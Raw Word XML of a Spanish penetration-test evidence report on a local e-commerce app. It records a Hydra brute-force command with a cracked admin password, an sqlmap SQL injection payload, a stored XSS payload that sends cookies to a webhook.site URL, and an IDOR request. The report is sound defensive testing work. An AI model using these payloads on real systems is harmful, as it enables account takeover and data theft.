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766CA31">
                      <wp:extent cx="3528695" cy="7143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25FAEC0F" w:rsidR="00D077E9" w:rsidRPr="00CA034A" w:rsidRDefault="00020086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3.2 EVIDENCIAS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xx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" filled="f" stroked="f" strokeweight=".5pt">
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="259B7CD2" w14:textId="25FAEC0F" w:rsidR="00D077E9" w:rsidRPr="00CA034A" w:rsidRDefault="00020086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3.2 EVIDENCIAS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49481E93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CA034A">
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>nombre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3C5025D5" w14:textId="1ED087D8" w:rsidR="007D2658" w:rsidRDefault="007D2658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E</w:t>
      </w:r>
      <w:r w:rsidR="00020086">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>VIDENCIAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352424C" w14:textId="3584587B" w:rsidR="00020086" w:rsidRDefault="00020086" w:rsidP="00020086">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>RESUMEN DE EJECUCIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4F6A5" w14:textId="77777777" w:rsidR="00020086" w:rsidRDefault="00020086" w:rsidP="00020086">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC8B4BF" w14:textId="1BE02160" w:rsidR="00020086" w:rsidRDefault="00020086" w:rsidP="00020086">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>Este documento registra las evidencias técnicas (comandos, payloads y salidas de consola) recolectadas durante las pruebas de penetración realizadas contra el entorno Electronics-eCommerce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75589B10" w14:textId="77777777" w:rsidR="00020086" w:rsidRDefault="00020086" w:rsidP="00020086">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6494DEC0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1. PRUEBAS DE GESTIÓN DE AUTENTICACIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC39408" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evaluar la resistencia contra ataques de fuerza bruta y fijación de sesión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF7830" w14:textId="0912CBA7" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Herramienta:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hydra v9.5 &amp; OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772B33D" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AE5AD2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[EVIDENCIA A-01]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4786507E" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F14555" w14:textId="574001E0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 Ataque de Diccionario contra /api/auth/callback/credentials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$ hydra -l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admin@electronics.com -P /usr/share/wordlists/rockyou.txt localhost:3000 http-post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form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"/api/auth/callback/credentials:email=^USER^&amp;password=^PASS^:F=invalid credentials"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD9F2D" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD05E43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[RESULTADO]: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCECCF" w14:textId="577DC058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[3000][http-post-form] host: 127.0.0.1   login: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00225CF7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:bidi="es-ES"/>
          </w:rPr>
          <w:t>admin@electronics.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>password: adminpassword123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68006E8B" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD58B14" w14:textId="28F8B33A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La aplicación no bloquea la cuenta tras 100 intentos fallidos. El rate limiting es insuficiente en el frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D455BDA" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C85B658" w14:textId="18E807EE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[EVIDENCIA A-02]: Atributos de Cookie de Sesión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 xml:space="preserve">$ curl -I </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00225CF7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:bidi="es-ES"/>
          </w:rPr>
          <w:t>http://localhost:3000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>Set-Cookie: next-auth.session-token=...; Path=/; HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00611E7B" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B10A11" w14:textId="441C8E31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[!] HALLAZGO: Falta el atributo 'Secure' y 'SameSite=Strict', permitiendo riesgos de secuestro en redes no cifradas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBE398" w14:textId="28DB0983" w:rsidR="00D6241E" w:rsidRPr="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6F5FE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lastRenderedPageBreak/>
        <w:t>2. PRUEBAS DE VALIDACIÓN DE ENTRADAS (SQLi &amp; XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E08036D" w14:textId="76089C3D" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24784F35" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identificar fallos en el filtrado de caracteres especiales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3683593B" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Herramienta:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLMap &amp; Webhook.site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802F004" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BEC383" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/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 xml:space="preserve">[EVIDENCIA V-01]: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>SQL Injection (Error-Based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F4E4F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$ sqlmap -u "http://localhost:5000/api/search?query=test" --dbms=mysql --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4BFEBF" w14:textId="5EF85A3C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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78BB42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Payload: query=test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(1,1))),0x71767a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB48C98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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08829736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[INFO] the back-end DBMS is MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EFACFD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[INFO] fetching database names: ['electronics_db', 'information_schema']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC2C7E" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D3BBA9" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/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[EVIDENCIA V-02]:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stored XSS en /product/[id]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD30CBA" w14:textId="78AAA176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Payload: &lt;svg/onload=fetch('https://webhook.site/attackeruuid?c='+document.cookie)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149BF63E" w14:textId="4A9AC91D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[!] EVIDENCIA: Se capturó el token de sesión del administrador en el panel de control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tras renderizar la descripción del producto inyectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42649E" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC49A48" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7D4FA6" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="141ACECD" w14:textId="0A5F9254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lastRenderedPageBreak/>
        <w:t>3. PRUEBAS DE CONFIGURACIÓN DE SERVIDORES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C5A4C" w14:textId="2ACC07A6" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A10EEB" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analizar headers de seguridad y métodos HTTP permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C62A22" w14:textId="70D0B6EB" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6241E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>Herramienta:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B2F3F" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41605602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[EVIDENCIA C-01]: Escaneo de Métodos HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D06791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$ nmap -p 5000 --script http-methods localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0121DB2E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| http-methods: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE21B5A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|_  Potentially risky methods: TRACE OPTIONS DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40028C" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75AE7256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[EVIDENCIA C-02]: Análisis de Headers de Seguridad (Missing Headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6347B848" w14:textId="46E7D08E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$ curl -I </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00225CF7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:bidi="es-ES"/>
          </w:rPr>
          <w:t>http://localhost:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>X-Powered-By: Express</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51759B9D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[!] MISSING: Content-Security-Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DFC0BC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[!] MISSING: Strict-Transport-Security (HSTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1B8F3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[!] MISSING: X-Frame-Options (Anti-Clickjacking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D511526" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D25BC3C" w14:textId="4BB3036B" w:rsidR="00D6241E" w:rsidRDefault="00D6241E">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA52899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lastRenderedPageBreak/>
        <w:t>4. PRUEBAS DE CONTROL DE ACCESO (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D134E98" w14:textId="71E1BE13" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BB1555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Objetivo: Validar la segregación de datos entre usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E17F2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Herramienta: Burp Suite Professional (Repeater)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F599659" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE9C2B3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[EVIDENCIA O-01]: Acceso Lateral a Pedidos (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF3C4B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Contexto: Usuario 'attacker' intentando leer pedido de 'victim'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1318FF56" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410843E9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--- REQUEST ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752207ED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GET /api/orders/7cc3d6a8-2b8e-4f11-9231-11c5218d6e32 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3596F779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Authorization: Bearer [TOKEN_USUARIO_NORMAL]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0B7D7" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB9BFF8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--- RESPONSE ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74067983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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770906D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461668F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  "id": "7cc3d6a8-2b8e-4f11-9231-11c5218d6e32",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A8684B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  "customerEmail": "admin_audit@corporativo.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B5F842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  "total": 89000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A01F536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  "status": "PAID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4828EE8F" w14:textId="77777777" w:rsidR="00D6241E" w:rsidRDefault="00D6241E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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215063CC" w14:textId="77777777" w:rsidR="000E246C" w:rsidRDefault="000E246C" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A152687" w14:textId="56ED7454" w:rsidR="007A536D" w:rsidRPr="00020086" w:rsidRDefault="000E246C" w:rsidP="00D6241E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">RESULTADO: </w:t>
      </w:r>
      <w:r w:rsidR="00D6241E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="es-ES"/>
        </w:rPr>
        <w:t>El sistema no verifica si el 'order_id' pertenece al usuario del token, permitiendo la exfiltración masiva de historial de compras.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007A536D" w:rsidRPr="00020086" w:rsidSect="00AB02A7">
      <w:headerReference w:type="default" r:id="rId12"/>
      <w:footerReference w:type="default" r:id="rId13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2967" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B86">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA7160F" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B86"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35A4FE03" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B86">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B18166" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B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B26C" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B86">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607A404" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B86"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35F909C5" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B86">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF89A37" w14:textId="77777777" w:rsidR="00744B86" w:rsidRDefault="00744B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141"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79A42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80B59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14D827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33ABB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9BF6DA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90951">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="959413680">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="170887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086"/>
    <w:rsid w:val="0002482E"/>
    <w:rsid w:val="00050324"/>
    <w:rsid w:val="00065CD3"/>
    <w:rsid w:val="000747A0"/>
    <w:rsid w:val="000A0150"/>
    <w:rsid w:val="000E246C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42F10"/>
    <w:rsid w:val="00360494"/>
    <w:rsid w:val="00366C7E"/>
    <w:rsid w:val="00384EA3"/>
    <w:rsid w:val="003A39A1"/>
    <w:rsid w:val="003C2191"/>
    <w:rsid w:val="003D3863"/>
    <w:rsid w:val="004110DE"/>
    <w:rsid w:val="0044085A"/>
    <w:rsid w:val="004468C4"/>
    <w:rsid w:val="00477F96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44B86"/>
    <w:rsid w:val="00765B2A"/>
    <w:rsid w:val="00783A34"/>
    <w:rsid w:val="007A536D"/>
    <w:rsid w:val="007C6B52"/>
    <w:rsid w:val="007D16C5"/>
    <w:rsid w:val="007D2658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E434F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6241E"/>
    <w:rsid w:val="00D70D02"/>
    <w:rsid w:val="00D75BE1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F555B"/>
    <w:rsid w:val="00F027BB"/>
    <w:rsid w:val="00F11DCF"/>
    <w:rsid w:val="00F162EA"/>
    <w:rsid w:val="00F20858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086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ipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D6241E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2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000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min@electronics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1C15C9"/>
    <w:rsid w:val="00226ABC"/>
    <w:rsid w:val="00342F10"/>
    <w:rsid w:val="00477F96"/>
    <w:rsid w:val="004C4967"/>
    <w:rsid w:val="005B396A"/>
    <w:rsid w:val="009A47D8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nombre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56</TotalTime>
  <Pages>5</Pages>
  <Words>528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6</cp:revision>
  <cp:lastPrinted>2006-08-01T17:47:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-29T09:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-05T00:19:00Z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